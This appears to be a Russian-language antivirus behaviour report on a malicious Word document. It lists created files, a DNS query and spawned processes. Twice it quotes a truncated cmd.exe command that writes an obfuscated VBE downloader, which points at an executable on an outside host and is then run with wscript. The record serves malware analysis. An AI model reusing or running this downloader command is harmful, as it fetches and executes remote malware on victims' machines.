Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO F9n= "http://diplomaticcourier.net/imaga/ken.exe">>Z9n.VBE &@ECHO U7n = E3a("lbUVXBYlY")>>Z9n.VBE &@ECHO Set R9p = CreateObject(E3a("agla`FBla`\hhd"))>>Z9n.VBE &@ECHO R9p.O...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\z9n.vbe
- %TEMP%\z9n.vbe
- %TEMP%\word\<Имя файла>.doc
- DNS ASK di#####ticcourier.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\Z9n.VBE"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO F9n= "http://diplomaticcourier.net/imaga/ken.exe">>Z9n.VBE &@ECHO U7n = E3a("lbUVXBYlY")>>Z9n.VBE &@ECHO Set R9p = CreateObject(E3a("agla`FBla`\hhd"))>>Z9n.VBE &@ECHO R9p.O...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13